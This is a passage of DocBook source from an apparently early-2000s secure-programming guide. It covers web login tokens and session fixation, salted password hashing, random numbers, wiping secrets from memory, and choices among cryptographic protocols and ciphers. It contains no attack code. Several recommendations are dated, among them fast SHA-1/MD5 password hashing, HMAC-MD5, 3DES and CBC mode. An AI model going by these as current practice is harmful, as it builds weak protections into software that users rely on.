</para>

<para>
Note that some users don't accept cookies, so this solution still has
some problems.
If you want to support these users,
you should send this authentication information back and forth via
HTML form hidden fields
(since nearly all browsers support them without concern).
You'd use the same approach as with cookies - you'd just use a different
technology to have the data sent from the user to the server.
Naturally, if you implement this approach, you need to include settings to
ensure that these pages aren't cached for use by others.
However, while I think avoiding cookies
is preferable, in practice these other approaches often require
much more development effort.
Since it's so hard to implement this on a large scale for many
application developers, I'm not currently stressing these approaches.
I would rather describe an approach that is reasonably secure and
reasonably easy to implement, than emphasize approaches that are too
hard to implement correctly (by either developers or users).
However, if you can do so without much effort, by all means support
sending the authentication information using form hidden fields and
an encrypted link (e.g., SSL/TLS).
As with all cookies, for these cookies you
should turn on the HttpOnly flag unless
you have a web browser script that must be able to read the cookie.
</para>

<para>
Fu [2001] discusses client authentication on the web, along with a
suggested approach, and this is the approach I suggest for most sites.
The basic idea is that client authentication is split into two parts,
a ``login procedure'' and ``subsequent requests.''
In the login procedure, the server asks for the user's username and password,
the user provides them, and the server replies with an
``authentication token''.
In the subsequent requests, the client (web browser)
sends the authentication token
to the server (along with its request); the server verifies that the
token is valid, and if it is, services the request.
Another good source of information about web authentication is
Seifried [2001].
</para>

<para>
One serious problem with some web authentication techniques is that
they are vulnerable to a problem called "session fixation".
In a session fixation attack, the attacker fixes the user's session ID
before the user even logs into the target server, thus eliminating the
need to obtain the user's session ID afterwards.
Basically, the attacker obtains an account, and then tricks another
user into using the attacker's account - often by creating a special
hypertext link and tricking the user into clicking on it.
A good paper describing session fixation is the paper by
<ulink url="http://www.acros.si/papers/session_fixation.pdf">
Mitja Kolsek [2002]</ulink>.
A web authentication system you use should be resistant to session fixation.
</para>

<sect2 id="web-authentication-login">
<title>Authenticating on the Web: Logging In</title>
<para>
The login procedure is typically implemented as an HTML form;
I suggest using the field names ``username'' and ``password'' so that
web browsers can automatically perform some useful actions.
Make sure that the password is sent over an encrypted connection
(using SSL or TLS, through an https: connection) - otherwise, eavesdroppers
could collect the password.
Make sure all password text fields are marked as passwords in the HTML,
so that the password text is not visible to
anyone who can see the user's screen.
</para>

<para>
If both the username and password fields are filled in,
do not try to automatically log in as that user.
Instead, display the login form with the user and password fields;
this lets the user verify that they really want to log in as that user.
If you fail to do this, attackers will be able to exploit this weakness to
perform a session fixation attack.
Paranoid systems might want simply ignore the password field and make the
user fill it in, but this interferes with browsers which can store
passwords for users.
</para>

<para>
When the user sends username and password, it must be checked against
the user account database.
This database shouldn't store the passwords ``in the clear'', since if
someone got a copy of the this database they'd suddenly get everyone's
password (and users often reuse passwords).
Some use crypt() to handle this, but crypt can only handle a small
input, so I recommend using a different approach (this is my approach -
Fu [2001] doesn't discuss this).
Instead, the user database should store a username, salt, and
the password hash for that user.
The ``salt'' is just a random sequence of characters, used to make it
harder for attackers to determine a password even if they get the
password database - I suggest an 8-character random sequence.
It doesn't need to be cryptographically random, just different from
other users.
The password hash should be computed by concatenating
``server key1'', the user's password, and the salt, and
then running a cryptographically secure hash algorithm.
Server key1 is a secret key unique to this server - keep it separate
from the password database.
Someone who has server key1 could then run programs to crack user
passwords if they also had the password database;
since it doesn't need to be memorized, it can be a long and complex
password.
Most secure would be HMAC-SHA-1 or HMAC-MD5;
you could use SHA-1 (most web sites aren't really worried about
the attacks it allows) or MD5 (but MD5 would be poorer choice;
see the discussion about MD5).
</para>

<para>
Thus, when users create their accounts, the password is hashed and
placed in the password database.
When users try to log in, the purported password is hashed and compared
against the hash in the database (they must be equal).
When users change their password, they should type in both the old
and new password, and the new password twice (to make sure they didn't
mistype it); and again, make sure none of these password's characters
are visible on the screen.
</para>

<para>
By default, don't save the passwords themselves on the client's
web browser using cookies - users may sometimes use shared clients
(say at some coffee shop).
If you want, you can give users the option of ``saving the password''
on their browser, but if you do, make sure that the password is set to
only be transmitted on ``secure'' connections, and make sure the user has
to specifically request it (don't do this by default).
</para>

<para>
Make sure that the page is marked to not be cached, or a proxy
server might re-serve that page to other users.
</para>

<para>
Once a user successfully logs in, the server needs to send the client
an ``authentication token'' in a cookie, which is described next.
</para>

</sect2>

<sect2 id="web-authentication-subsequent">
<title>Authenticating on the Web: Subsequent Actions</title>
<para>
Once a user logs in, the server sends back to the client a cookie
with an authentication token that will be used from then on.
A separate authentication token is used, so that users don't need to keep
logging in, so that passwords aren't continually sent back and forth, and
so that unencrypted communication can be used if desired.
A suggested token (ignoring session fixation attacks) would look like this:
<programlisting>
  exp=t&amp;data=s&amp;digest=m
</programlisting>
Where t is the expiration time of the token (say, in several hours),
and data s identifies the user (say, the user name or session id).
The digest is a keyed digest of the other fields.
Feel free to change the field name of ``data'' to be more descriptive
(e.g., username and/or sessionid).
If you have more than one field of data (e.g., both a username and a
sessionid), make sure the digest uses both the field names and data values
of all fields you're authenticating; concatenate them with a pattern
(say ``%%'', ``+'', or ``&amp;'')
that can't occur in any of the field data values.
As described in a moment, it would be a good idea to include a username.
The keyed digest should be a cryptographic hash of the other information in
the token, keyed using a different server key2.
The keyed digest should use HMAC-MD5 or HMAC-SHA1, using a different server
key (key2), though simply using SHA1 might be okay for some purposes
(or even MD5, if the risks are low).
Key2 is subject to brute force guessing attacks, so it should be
long (say 12+ characters) and unguessable; it does NOT need to be easily
remembered.
If this key2 is compromised, anyone can authenticate to the server, but
it's easy to change key2 - when you do, it'll simply force currently
``logged in'' users to re-authenticate.
See Fu [2001] for more details.
</para>

<para>
There is a potential weakness in this approach.
I have concerns that Fu's approach, as originally described, is weak against
session fixation attacks (from several different directions, which
I don't want to get into here).
Thus, I now suggest modifying Fu's approach and using this token format
instead:
<programlisting>
  exp=t&amp;data=s&amp;client=c&amp;digest=m
</programlisting>
This is the same as the original Fu aproach, and older versions of
this book (before December 2002) didn't suggest it.
This modification adds a new
"client" field to uniquely identify the client's current location/identity.
The data in the client field should be something that should change
if someone else tries to use the account; ideally, its new value should be
unguessable, though that's hard to accomplish in practice.
Ideally the client field would be the client's SSL client certificate,
but currently that's a suggest that is hard to meet.
At the least, it should be the user's IP address (as perceived from
the server, and remember to plan for IPv6's longer addresses).
This modification doesn't completely counter session fixation attacks,
unfortunately (since if an attacker can determine what the user
would send, the attacker may be able to make a request to a server
and convince the client to accept those values).
However, it does add resistance to the attack.
Again, the digest must now include all the other data.
</para>

<para>
Here's an example.
If a user logs into foobar.com sucessfully, you might establish
the expiration date as 2002-12-30T1800 (let's assume we'll transmit as
ASCII text in this format for the moment), the username as "fred",
the client session as "1234", and you might determine that the
client's IP address was 5.6.7.8.
If you use a simple SHA-1 keyed digest
(and use a key prefixing the rest of the data), with the server key2 value of
"rM!V^m~v*Dzx", the digest could be computed over:
<programlisting>
 exp=2002-12-30T1800&amp;user=fred&amp;session=1234&amp;client=5.6.7.8
</programlisting>
A keyed digest can be computed by running a cryptographic hash code
over, say, the server key2, then the data;
in this case, the digest would be:
<programlisting>
101cebfcc6ff86bc483e0538f616e9f5e9894d94
</programlisting>
</para>

<para>
From then on, the server must check the expiration time and recompute the
digest of this authentication token, and only accept client requests
if the digest is correct.
If there's no token, the server should reply with the user login page
(with a hidden form field to show where the successful login should go
afterwards).
</para>

<para>
It would be prudent to display the username, especially on important
screens, to help counter session fixation attacks.
If users are given feedback on their username, they may notice if they
don't have their expected username.  This is helpful anyway if it's
possible to have an unexpected username (e.g., a family that shares the
same machine).
Examples of important screens include those when a file is uploaded
that should be kept private.
</para>

<para>
One odd implementation issue: although the specifications for the
"Expires:" (expiration time) field for cookies
permit time zones, it turns out that some versions of
Microsoft's Internet Explorer don't implement time zones correctly
for cookie expiration.
Thus, you need to always use UTC time (also called Zulu time)
in cookie expiration times for maximum portability.
<!-- http://lwn.net/Articles/11981/ -->
It's a good idea in general to use UTC time for time values,
and convert when necessary for human display, since this eliminates other
time zone and daylight savings time issues.
</para>

<para>
If you include a sessionid in the authentication token, you can limit
access further.
Your server could ``track'' what pages a user has seen in a given session,
and only permit access to other appropriate pages from that point
(e.g., only those directly linked from those page(s)).
For example,
if a user is granted access to page foo.html, and page foo.html has
pointers to resources bar1.jpg and bar2.png, then accesses to bar4.cgi
can be rejected.
You could even kill the session, though only do this if the authentication
information is valid (otherwise, this would make it possible for
attackers to cause denial-of-service attacks on other users).
This would somewhat limit the access an attacker has, even if they
successfully hijack a session, though clearly an attacker with time
and an authentication token
could ``walk'' the links just as a normal user would.
</para>

<para>
One decision is whether or not to require the authentication token and/or
data to be sent over a secure connection (e.g., SSL).
If you send an authentication token
in the clear (non-secure), someone who intercepts the
token could do whatever the user could do until the expiration time.
Also, when you send data over an unencrypted link, there's the risk of
unnoticed change by an attacker; if you're worried that someone might change the
data on the way, then you need to authenticate the data being transmitted.
Encryption by itself doesn't guarantee authentication, but it does make
corruption more likely to be detected, and typical libraries can support
both encryption and authentication in a TLS/SSL connection.
In general, if you're encrypting a message, you should also authenticate it.
If your needs vary,
one alternative is to create two authentication tokens - one is used
only in a ``secure'' connection for important operations, while the other
used for less-critical operations.
Make sure the token used for ``secure'' connections is marked so that only
secure connections (typically encrypted SSL/TLS connections) are used.
If users aren't really different, the authentication token could omit
the ``data'' entirely.
</para>

<para>
Again, make sure that the pages with this authentication token aren't cached.
There are other reasonable schemes also; the goal of this text is
to provide at least one secure solution.
Many variations are possible.
</para>

</sect2>

<sect2 id="web-authentication-logout">
<title>Authenticating on the Web: Logging Out</title>
<para>
You should always provide users with a mechanism to ``log out'' - this
is especially helpful for customers using shared browsers
(say at a library).
Your ``logout'' routine's task is simple - just unset the client's
authentication token.
</para>
</sect2>

</sect1>

<sect1 id="random-numbers">
<title>Random Numbers</title>

<para>
In many cases secure programs must generate ``random'' numbers that
cannot be guessed by an adversary.
Examples include session keys, public or private keys, symmetric keys,
nonces and IVs used in many protocols, salts, and so on.
Ideally, you should use a truly random source of data for random numbers,
such as values based on
radioactive decay (through precise timing of Geiger counter
clicks), atmospheric noise, or thermal noise in electrical circuits.
Some computers have a hardware component that functions as
a real random value generator, and if it's available you should use it.
</para>

<para>
However, most computers don't have hardware that generates truly
random values, so in most cases you need a way to generate random numbers
that is sufficiently random that an adversary can't predict it.
In general, this means that you'll need three things:
<itemizedlist>
<listitem><para>
An ``unguessable'' state; typically this is done by measuring
variances in timing of low-level devices
(keystrokes, disk drive arm jitter, etc.)
in a way that an adversary cannot control.
</para></listitem>
<listitem><para>
A cryptographically strong pseudo-random number generator (PRNG), which
uses the state to generate ``random'' numbers.
</para></listitem>
<listitem><para>
A large number of bits (in both the seed and the resulting value used).
There's no point in having a strong PRNG if you only have a few possible values,
because this makes it easy for an attacker to use brute force attacks.
The number of bits necessary varies depending on the circumstance, however,
since these are often used as cryptographic keys, the normal rules of
thumb for keys apply.
For a symmetric key (result), I'd use at least 112 bits (3DES), 128 bits is
a little better, and 160 bits or more is even safer.
</para></listitem>
</itemizedlist>
Typically the PRNG uses the state to generate some values, and then
some of its values and other unguessable inputs are used to update the state.
There are lots of ways to attack these systems.
For example, if an attacker can control or view inputs to the state
(or parts of it), the attacker may be able
to determine your supposedly ``random'' number.
</para>

<para>
A real danger with PRNGs is that most computer language libraries include
a large set of pseudo-random number generators (PRNGs)
which are <emphasis>inappropriate</emphasis> for security purposes.
Let me say it again:
<emphasis>do not use typical random number generators for security
purposes</emphasis>.
Typical library PRNGs
are intended for use in simulations, games, and so on; they are
<emphasis remap="it">not</emphasis> sufficiently random for use
in security functions such as key generation.
Most non-cryptographic
library PRNGs are some variation of ``linear congruential generators'',
where the ``next'' random value is computed as "(aX+b)&nbsp;mod&nbsp;m"
(where X is the previous value).
Good linear congruential generators are fast and have useful statistical
properties, making them appropriate for their intended uses.
The problem with such PRNGs is that future values can be easily deduced
by an attacker (though they may appear random).
Other algorithms for generating random numbers quickly, such as
quadratic generators and cubic generators, have also been broken
[Schneier 1996].
In short, you have to use cryptographically strong PRNGs to
generate random numbers in secure applications - ordinary random number
libraries are not sufficient.
</para>

<para>
Failing to correctly generate truly random values for keys has caused
a number of problems, including holes in Kerberos,
the X window system, and NFS [Venema 1996].
</para>

<para>
If possible, you should use system services
(typically provided by the operating system) that are expressly designed
to create cryptographically secure random values.
For example,
the Linux kernel (since 1.3.30) includes a random number generator, which
is sufficient for many security purposes.
This random number generator  gathers  environmental  noise
from  device  drivers  and  other  sources into an entropy pool.
When accessed as /dev/random, random bytes are only returned
within the estimated number of bits of noise in the entropy pool
(when the entropy pool is empty, the call blocks until additional
environmental noise is gathered).
When accessed as /dev/urandom, as many bytes as are requested are
returned even when the entropy pool is exhausted.
If you are using the random values for cryptographic purposes (e.g.,
to generate a key) on Linux, use /dev/random.
*BSD systems also include /dev/random.
Solaris users with the SUNWski package also have /dev/random.
Note that if a hardware random number generator is available and its
driver is installed, it will be used instead.
More information is available in the system documentation random(4).
</para>

<para>
On other systems, you'll need to find another way to get truly random results.
One possibility for other Unix-like systems
is the Entropy Gathering Daemon (EGD), which monitors system
activity and hashes it into random values; you can get it at
<ulink url="http://www.lothar.com/tech/crypto">http://www.lothar.com/tech/crypto</ulink>.
You might consider using a
cryptographic hash functions (e.g., SHA-1) on PRNG outputs.
By using a hash algorithm, even if the PRNG turns out to be guessable,
this means that the attacker must now also break the hash function.
</para>

<para>
If you have to implement a strong PRNG yourself,
a good choice for a cryptographically strong (and patent-unencumbered)
PRNG is the Yarrow algorithm; you can learn more about Yarrow from
<ulink url="http://www.counterpane.com/yarrow.html">http://www.counterpane.com/yarrow.html</ulink>.
Some other PRNGs can be useful, but many widely-used ones
have known weaknesses that may or may not matter depending on your application.
Before implementing a PRNG yourself, consult the literature, such as
[Kelsey 1998] and [McGraw 2000a].
You should also examine
<ulink url="http://www.ietf.org/rfc/rfc1750.txt">IETF RFC 1750</ulink>.
NIST has some useful information; see the
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-22/sp-800-22-051501.pdf">NIST publication 800-22</ulink> and
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-22/errata-sheet.pdf">NIST errata</ulink>.
You should know about the
<ulink url="http://stat.fsu.edu/~geo/diehard.html">diehard tests</ulink> too.
You might want to examine
the paper titled
<!-- http://www.cryptonomicon.net/links.php?op=visit&amp;lid=406 -->
"how Intel checked its PRNG", but unfortunately that paper appears to be
unavailable now.
</para>

</sect1>

<sect1 id="protect-secrets">
<title>Specially Protect Secrets (Passwords and Keys) in User Memory</title>
<para>
If your application must handle passwords or non-public keys
(such as session keys, private keys, or secret keys), try to hide them
and overwrite them immediately after using them so they have minimal exposure.
</para>

<para>
Systems such as Linux support the mlock() and mlockall() calls to
keep memory from being paged to disk (since someone might acquire the
kep later from the swap file).
Note that on Linux this is a privileged system call, which causes its
own issues (do I grant the program superuser privileges so it can call
mlock, if it doesn't need them otherwise?).
</para>

<para>
Also, if your program handles such secret values, be sure to disable creating
core dumps (via ulimit).  Otherwise, an attacker may be able to halt the
program and find the secret value in the data dump.
</para>

<para>
Beware - normally processes can monitor other processes through
the calls for debuggers (e.g., via ptrace(2) and the /proc pseudo-filesystem)
[Venema 1996]
Kernels usually protect against these monitoring routines if the process is
setuid or setgid
(on the few ancient ones that don't, there really isn't a good way to
defend yourself other than upgrading).
Thus, if your process manages secret values, you probably should make it
setgid or setuid (to a different unprivileged group or user) to forceably
inhibit this kind of monitoring.
Unless you need it to be setuid, use setgid (since this grants fewer
privileges).
</para>


<para>
Then there's the problem of being able to actually overwrite the value, which
often becomes language and compiler specific.
In many languages, you need to make sure that you store
such information in mutable locations, and then overwrite those locations.
For example,
in Java, don't use the type String to store a password because Strings are
immutable (they will not be overwritten until garbage-collected and
then reused, possibly a far time in the future).
Instead, in Java use char[] to store a password, so it can be
immediately overwritten.
In Ada, use type String (an array of characters),
and not type Unbounded_String, to make sure
that you have control over the contents.
</para>

<para>
In many languages (including C and C++),
be careful that the compiler doesn't optimize away the "dead code"
for overwriting the value - since in this case it's not dead code.
Many compilers, including many C/C++ compilers, remove writes
to stores that are no longer used - this is often referred to as
"dead store removal."
Unfortunately, if the write is really to overwrite the value of a secret,
this means that code that appears to be correct will be silently discareded.
Ada provides the pragma Inspection_Point; place this after the
code erasing the memory, and that way you can be certain that
the object containing the secret will really be erased
(and that the overwriting won't be optimized away).
</para>

<para>
<!-- "When scrubbing secrets doesn't work" discusses this in Bugtraq
     November 2002, but this is actually a really old issue that keeps
     re-surfacing.
-->
A Bugtraq post by Andy Polyakov (November 7, 2002) reported that
the C/C++ compilers gcc version 3 or higher, SGI MIPSpro, and the Microsoft
compilers eliminated simple inlined calls to memset
intended to overwrite secrets.
This is allowed by the C and C++ standards.
Other C/C++ compilers (such as gcc less than version 3) preserved the inlined
call to memset at all optimization levels, showing that the issue
is compiler-specific.
Simply declaring that the destination data is volatile doesn't
help on all compilers; both the MIPSpro and Microsoft compilers
ignored simple "volatilization".
Simply "touching" the first byte of the secret data doesn't help either;
he found that the MIPSpro and GCC>=3 cleverly nullify only the first byte
and leave the rest intact (which is actually quite clever - the problem
is that the compiler's cleverness is interfering with our goals).
One approach that
seems to work on all platforms is to
write your own implementation of memset with internal "volatilization"
of the first argument (this code is based on a
<ulink url="http://online.securityfocus.com/archive/82/298061/2002-10-27/2002-11-02/0">workaround proposed by Michael Howard</ulink>):
<programlisting>
 void *guaranteed_memset(void *v,int c,size_t n)
  { volatile char *p=v; while (n--) *p++=c; return v; }
</programlisting>
Then place this definition into an external file to force the function to
be external (define the function in a corresponding .h file, and #include
the file in the callers, as is usual).
This approach appears to be safe
at any optimization level (even if the function gets inlined).
</para>

</sect1>

<sect1 id="crypto">
<title>Cryptographic Algorithms and Protocols</title>

<para>
Often cryptographic algorithms and protocols are necessary to keep
a system secure, particularly when communicating through an untrusted
network such as the Internet.
Where possible, use cryptographic techniques to authenticate information and
keep the information private
(but don't assume that simple encryption automatically authenticates as well).
Generally you'll need to use a suite of available tools to
secure your application.
</para>

<para>
For background information and code, you should probably look at
the classic text ``Applied Cryptography'' [Schneier 1996].
The newsgroup ``sci.crypt'' has a series of FAQ's; you can find them
at many locations, including
<ulink url="http://www.landfield.com/faqs/cryptography-faq">http://www.landfield.com/faqs/cryptography-faq</ulink>.
Linux-specific resources include the Linux Encryption HOWTO at
<ulink
url="http://marc.mutz.com/Encryption-HOWTO/">http://marc.mutz.com/Encryption-HOWTO/</ulink>.
A discussion on how protocols use the basic algorithms can be
found in [Opplinger 1998].
A useful collection of papers on how to apply cryptography in
protocols can be found in [Stallings 1996].
What follows here is just a few comments; these areas are rather
specialized and covered more thoroughly elsewhere.
</para>

<para>
Cryptographic protocols and algorithms are difficult to get right,
so do not create your own.
Instead, where you can, use protocols and algorithms that are
widely-used, heavily analyzed, and accepted as secure.
When you must create anything, give the approach wide public review and
make sure that professional security analysts examine it for problems.
In particular, do not create your own encryption algorithms unless you are
an expert in cryptology, know what you're doing, and plan to spend
years in professional review of the algorithm.
Creating encryption algorithms (that are any good) is a task for experts only.
</para>


<para>
A number of algorithms are patented; even if the owners permit
``free use'' at the moment, without a signed contract they can always
change their minds later, putting you at extreme risk later.
In general, avoid all patented algorithms -
in most cases there's an unpatented approach that is at least as good
or better technically, and by doing so you avoid a large number
of legal problems.
</para>

<para>
Another complication is that many counties regulate or restrict
cryptography in some way.
A survey of legal issues is available at the ``Crypto Law Survey'' site,
<ulink url="http://rechten.kub.nl/koops/cryptolaw/">http://rechten.kub.nl/koops/cryptolaw/</ulink>.
</para>

<para>
Often, your software should provide a way to
reject ``too small'' keys, and let the user set what ``too small'' is.
For RSA keys, 512 bits is too small for use.
There is increasing evidence that
1024 bits for RSA keys is not enough either;
Bernstein has suggested techniques that simplify brute-forcing RSA, and
other work based on it
(such as Shamir and Tromer's "Factoring Large Numbers with the TWIRL device")
now suggests that 1024 bit keys can be broken in a year
by a $10 Million device.
You may want to
make 2048 bits the minimum for RSA if you really want a secure system,
and you should certainly do so if you plan to use those keys after 2015.
For more about RSA specifically, see
<ulink url="http://www.rsasecurity.com/rsalabs/technotes/bernstein.html">RSA's
commentary on Bernstein's work</ulink>.
For a more general discussion of key length and other general
cryptographic algorithm issues, see
<ulink url="http://csrc.nist.gov/encryption/kms/key-management-guideline-(workshop).pdf">NIST's key management workshop in November 2001</ulink>.
</para>

<sect2 id="crypto-protocols">
<title>Cryptographic Protocols</title>

<para>
When you need a security protocol, try to use standard-conforming protocols
such as IPSec, SSL (soon to be TLS), SSH, S/MIME, OpenPGP/GnuPG/PGP,
and Kerberos.
Each has advantages and disadvantages;
many of them overlap somewhat in functionality, but each tends to be
used in different areas:

<itemizedlist>
<listitem>
<para>
Internet Protocol Security (IPSec).
IPSec provides encryption and/or authentication at the IP packet level.
However, IPSec is often used in a way that
only guarantees authenticity of two
communicating hosts, not of the users.
As a practical matter, IPSec usually requires low-level support
from the operating system (which not all implement) and
an additional keyring server that must be configured.
Since IPSec can be used as a "tunnel" to secure packets belonging to
multiple users and multiple hosts, it is especially useful for
building a Virtual Private Network (VPN) and connecting a remote machine.
As of this time, it is much less often used to secure communication
from individual clients to servers.
The new version of the Internet Protocol, IPv6, comes with
IPSec ``built in,'' but IPSec also works with the more common IPv4 protocol.
Note that if you use IPSec, don't use the encryption mode without the
authentication, because the authentication also acts as
integrity protection.
</para>
</listitem>

<listitem>
<para>
Secure Socket Layer (SSL) / TLS.
SSL/TLS works over TCP and tunnels other protocols using TCP, adding
encryption, authentication of the server, and optional authentication
of the client (but authenticating clients using SSL/TLS requires
that clients have configured X.509 client certificates, something
rarely done).
SSL version 3 is widely used; TLS is a later adjustment to SSL that
strengthens its security and improves its flexibility.
Currently there is a slow transition going on from SSLv3 to TLS, aided
because implementations can easily try to use TLS and then back off to SSLv3
without user intervention.
Unfortunately, a few bad SSLv3 implementations cause problems with the
backoff, so you may need a preferences setting to allow users to skip
using TLS if necessary.
Don't use SSL version 2, it has some serious security weaknesses.
</para>
<para>
SSL/TLS is the primary method for protecting http (web) transactions.
Any time you use an "https://" URL, you're using SSL/TLS.
Other protocols that often use SSL/TLS include POP3 and IMAP.
SSL/TLS usually use a separate TCP/IP port
number from the unsecured port, which the IETF is a little unhappy about
(because it consumes twice as many ports; there are solutions to this).
SSL is relatively easy to use in programs, because
most library implementations allow programmers to use operations
similar to the operations on standard sockets like
SSL_connect(), SSL_write(), SSL_read(), etc.
A widely used OSS/FS implementation of SSL (as well as other capabilities)
is OpenSSL, available at
<ulink url="http://www.openssl.org">http://www.openssl.org</ulink>.
</para>
</listitem>

<listitem>
<para>
OpenPGP and S/MIME.
There are two competing, essentially incompatible standards for
securing email: OpenPGP and S/MIME.
OpenPHP is based on the PGP application; an OSS/FS implementation is
GNU Privacy Guard from
<ulink url="http://www.gnupg.org">http://www.gnupg.org</ulink>.
Currently, their certificates are often not interchangeable;
work is ongoing to repair this.
</para>
</listitem>

<listitem>
<para>
SSH.
SSH is the primary method of securing ``remote terminals'' over an
internet, and it also includes methods for
tunelling X Windows sessions.
However, it's been extended to support single sign-on and
general secure tunelling for TCP streams, so it's often
used for securing other data streams too (such as CVS accesses).
The most popular implementation of SSH is OpenSSH
<ulink url="http://www.openssh.com">http://www.openssh.com</ulink>,
which is OSS/FS.
Typical uses of SSH allows the client to authenticate that the
server is truly the server, and
then the user enters a password to authenticate the user
(the password is encrypted and sent to the other system for verification).
Current versions of SSH can store private keys, allowing users to not
enter the password each time.
To prevent man-in-the-middle attacks, SSH records keying information
about servers it talks to; that means that typical use of
SSH is vulnerable to a man-in-the-middle attack during the
very first connection, but it can detect problems afterwards.
In contrast, SSL generally uses a certificate authority, which eliminates
the first connection problem but requires special setup (and payment!) to
the certificate authority.
</para>
</listitem>


<listitem>
<para>
Kerberos.
Kerberos is a protocol for single sign-on and authenticating users
against a central authentication and key distribution server. Kerberos
works by giving authenticated users "tickets", granting them access to
various services on the network.
When clients then contact servers, the servers can verify the tickets.
Kerberos is a primary method for securing and supporting authentication
on a LAN, and for establishing shared secrets (thus, it needs to be
used with other algorithms for the actual protection of communication).
Note that to use Kerberos, both the client and server have to include
code to use it, and since not everyone has a Kerberos setup, this has
to be optional - complicating the use of Kerberos in some programs.
However, Kerberos is widely used.
</para>
</listitem>

</itemizedlist>
</para>


<para>
Many of these protocols allow you to select a number of different
algorithms, so you'll still need to pick reasonable defaults for
algorithms (e.g., for encryption).
</para>

</sect2>

<sect2 id="symmetric-encryption">
<title>Symmetric Key Encryption Algorithms</title>

<para>
The use, export, and/or import of implementations of
encryption algorithms are restricted in many countries, and the laws
can change quite rapidly.
Find out what the rules are before trying to build applications using
cryptography.
</para>

<para>
For secret key (bulk data) encryption algorithms,
use only encryption algorithms that have been openly published and withstood
years of attack, and check on their patent status.
I would recommend using the
new Advanced Encryption Standard (AES), also known as Rijndahl --
a number of cryptographers have analyzed it and not found any serious weakness
in it, and I believe it has been through enough analysis
to be trustworthy now.
However, in August 2002
researchers Fuller and Millar
discovered a mathematical property of the cipher that,
while not an attack, might be exploitable into an attack
(the approach may actually has serious consequences for some other
algorithms, too).
Thus, it's worth staying tuned to future work.
<!--
AES property - Abstract is here:
http://eprint.iacr.org/2002/111/
Full report (postscript) written by Fuller, J, & Millar, M.  (Aug, 2002):
http://eprint.iacr.org/2002/111.ps
-->
A good alternative to AES is the Serpent algorithm, which is slightly slower
but is very resistant to attack.
For many applications triple-DES is a very good encryption algorithm; it
has a reasonably lengthy key (112 bits), no patent issues, and
a very long history of withstanding attacks (it's withstood attacks far
longer than any other encryption algorithm with reasonable key length in the
public literature, so it's probably the safest publicly-available
symmetric encryption algorithm when properly implemented).
However, triple-DES is very slow when implemented in software, so
triple-DES can be considered ``safest but slowest.''
Twofish appears to be a good encryption algorithm, but there are some
lingering questions - Sean Murphy and Fauzan Mirza showed that Twofish
has properties that cause many academics to be concerned (though as of yet
no one has managed to exploit these properties).
MARS is highly resistent to ``new and novel'' attacks, but it's more complex
and is impractical on small-ability smartcards.
For the moment I would avoid Twofish - it's quite likely that this will never
be exploitable, but it's hard to be sure and there are alternative
algorithms which don't have these concerns.
Don't use IDEA - it's subject to U.S. and European patents.
Don't use stupid algorithms such as XOR with a constant or constant string,
the ROT (rotation)
scheme, a Vinegere ciphers, and so on - these can be trivially broken
with today's computers.
Don't use ``double DES'' (using DES twice) - that's subject to a
``man in the middle'' attack that triple-DES avoids.
Your protocol should support multiple encryption algorithms, anyway;
that way, when an encryption algorithm is broken,
users can switch to another one.
</para>

<para>
For symmetric-key encryption (e.g., for bulk encryption), don't use a
key length less than 90 bits if you want the information
to stay secret through 2016
(add another bit for every additional 18 months of security) [Blaze 1996].
For encrypting worthless data, the old DES algorithm has some value,
but with modern hardware it's too easy to break DES's 56-bit key using
brute force.
If you're using DES, don't just use the ASCII text key as the key -
parity is in the least (not most) significant bit, so most DES algorithms
will encrypt using a key value well-known to adversaries;
instead, create a hash of the key and set the parity bits correctly
(and pay attention to error reports from your encryption routine).
So-called ``exportable'' encryption algorithms only have effective key lengths
of 40 bits, and are essentially worthless;
in 1996 an attacker could spend $10,000 to break such keys in twelve minutes
or use idle computer time to break them in a few days,
with the time-to-break halving every 18 months in either case.
</para>

<para>
Block encryption algorithms can be used in a number of different modes, such as
``electronic code book'' (ECB) and ``cipher block chaining'' (CBC).
In nearly all cases, use CBC, and do <emphasis>not</emphasis> use ECB mode -
in ECB mode, the same block of data always returns the same result inside
a stream, and this is often enough to reveal what's encrypted.
Many modes, including CBC mode, require an ``initialization vector'' (IV).
The IV doesn't need to be secret, but it does need to be unpredictable by
an attacker.
Don't reuse IV's across sessions - use a new IV each time you start a session.
</para>

<para>
There are a number of different streaming encryption algorithms, but
many of them have patent restrictions.
I know of no patent or technical issues with WAKE.
RC4 was a trade secret of RSA Data Security Inc; it's been leaked since,
and I know of no real legal impediment to its use, but RSA Data
Security has often threatened
court action against users of it (it's not at all clear what RSA Data
Security could do,
but no doubt they could tie up users in worthless court cases).
If you use RC4, use it as intended - in particular, always discard the
first 256 bytes it generates, or you'll be vulnerable to attack.
<!-- Fluhrer, Mantin, Shamir discuss attacks if 256 bytes not dropped -->
SEAL is patented by IBM - so don't use it.
SOBER is patented; the patent owner has claimed that it will allow many
uses for free if permission is requested, but this creates an impediment for
later use.
Even more interestingly, block encryption algorithms can be used in modes that
turn them into stream ciphers, and users who want stream ciphers should
consider this approach (you'll be able to choose between far more
publicly-available algorithms).
</para>

</sect2>


<sect2 id="public-key-encryption">
<title>Public Key Algorithms</title>

<para>
For public key cryptography (used, among other things, for
signing and sending secret keys), there are only a few
widely-deployed algorithms.
One of the most widely-used algorithms is RSA;
RSA's algorithm was patented, but only in the U.S., and that patent
expired in September 2000, so RSA can be freely used.
Never decrypt or sign a raw value that an attacker gives you directly using
RSA and expose the result, because that could expose the private key
(this isn't a problem in practice, because most protocols involve
signing a hash computed by the user - not the raw value - or don't expose
the result).
Never decrypt or sign the exact same raw value multiple times
(the original can be exposed).
Both of these can be solved by always adding random padding
(PGP does this) - the usual approach is called
Optimal Asymmetric Encryption Padding (OAEP).
</para>

<para>
The Diffie-Hellman key exchange algorithm is widely used to permit
two parties to agree on a session key.  By itself it doesn't guarantee that
the parties are who they say they are, or that there is no middleman, but
it does strongly help defend against passive listeners; its patent
expired in 1997.
If you use Diffie-Hellman to create a shared secret, be sure to hash it first
(there's an attack if you use its shared value directly).
</para>

<para>
NIST developed the digital signature standard (DSS) (it's a
modification of the ElGamal cryptosystem) for digital signature
generation and verification; one of the conditions for its development
was for it to be patent-free.
</para>

<para>
RSA, Diffie-Hellman, and El Gamal's techniques require more bits for the
keys for equivalent security compared to typical symmetric keys;
a 1024-bit key in these systems is supposed to be roughly equivalent
to an 80-bit symmetric key.
A 512-bit RSA key is considered completely unsafe;
Nicko van Someren has demonstrated that such small RSA keys
can be factored in 6 weeks using only already-available office hardware
(never mind equipment designed for the job).
